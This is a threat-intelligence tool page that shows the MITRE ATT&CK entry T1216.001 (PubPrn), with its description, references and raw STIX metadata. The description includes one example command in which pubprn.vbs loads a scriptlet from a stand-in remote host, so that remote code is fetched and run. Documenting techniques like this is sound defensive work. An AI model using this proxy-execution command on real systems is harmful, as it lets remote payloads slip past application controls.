TIARAS - T1216.001: PubPrn

MITRE ATT&CK Technique

Defense Evasion T1216.001

Description

Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).

Supported Platforms

Windows

Created

April 29, 2026

Last Updated

April 29, 2026

STIX Data

{'created': '2020-02-03T16:49:57.788Z',
 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',
 'description': 'Adversaries may use PubPrn to proxy execution of malicious '
                'remote files. PubPrn.vbs is a [Visual '
                'Basic](https://attack.mitre.org/techniques/T1059/005) script '
                'that publishes a printer to Active Directory Domain Services. '
                'The script may be signed by Microsoft and is commonly '
                'executed through the [Windows Command '
                'Shell](https://attack.mitre.org/techniques/T1059/003) via '
                '<code>Cscript.exe</code>. For example, the following code '
                'publishes a printer within the specified domain: '
                '<code>cscript pubprn Printer1 '
                'LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: '
                'pubprn)\n'
                '\n'
                'Adversaries may abuse PubPrn to execute malicious payloads '
                'hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To '
                'do so, adversaries may set the second <code>script:</code> '
                'parameter to reference a scriptlet file (.sct) hosted on a '
                'remote site. An example command is <code>pubprn.vbs 127.0.0.1 '
                'script:https://mydomain.com/folder/file.sct</code>. This '
                'behavior may bypass signature validation restrictions and '
                'application control solutions that do not account for abuse '
                'of this script.\n'
                '\n'
                'In later versions of Windows (10+), <code>PubPrn.vbs</code> '
                'has been updated to prevent proxying execution from a remote '
                'site. This is done by limiting the protocol specified in the '
                'second parameter to <code>LDAP://</code>, vice the '
                '<code>script:</code> moniker which could be used to reference '
                'remote code via HTTP(S).',
 'external_references': [{'external_id': 'T1216.001',
                          'source_name': 'mitre-attack',
                          'url': 'https://attack.mitre.org/techniques/T1216/001'},
                         {'description': 'Jason Gerend. (2017, October 16). '
                                         'pubprn. Retrieved July 23, 2021.',
                          'source_name': 'pubprn',
                          'url': 'https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn'},
                         {'description': 'Nelson, M. (2017, August 3). WSH '
                                         'INJECTION: A CASE STUDY. Retrieved '
                                         'April 9, 2018.',
                          'source_name': 'Enigma0x3 PubPrn Bypass',
                          'url': 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'}],
 'id': 'attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58',
 'kill_chain_phases': [{'kill_chain_name': 'mitre-attack',
                        'phase_name': 'defense-evasion'}],
 'modified': '2025-10-24T17:48:22.022Z',
 'name': 'PubPrn',
 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],
 'revoked': False,
 'spec_version': '2.1',
 'type': 'attack-pattern',
 'x_mitre_attack_spec_version': '3.2.0',
 'x_mitre_contributors': ['Atul Nair, Qualys'],
 'x_mitre_deprecated': False,
 'x_mitre_detection': '',
 'x_mitre_domains': ['enterprise-attack'],
 'x_mitre_is_subtechnique': True,
 'x_mitre_modified_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',
 'x_mitre_platforms': ['Windows'],
 'x_mitre_version': '2.1'}

Quick Actions

Edit TTP Update from Web

Back to TTPs

Dashboard About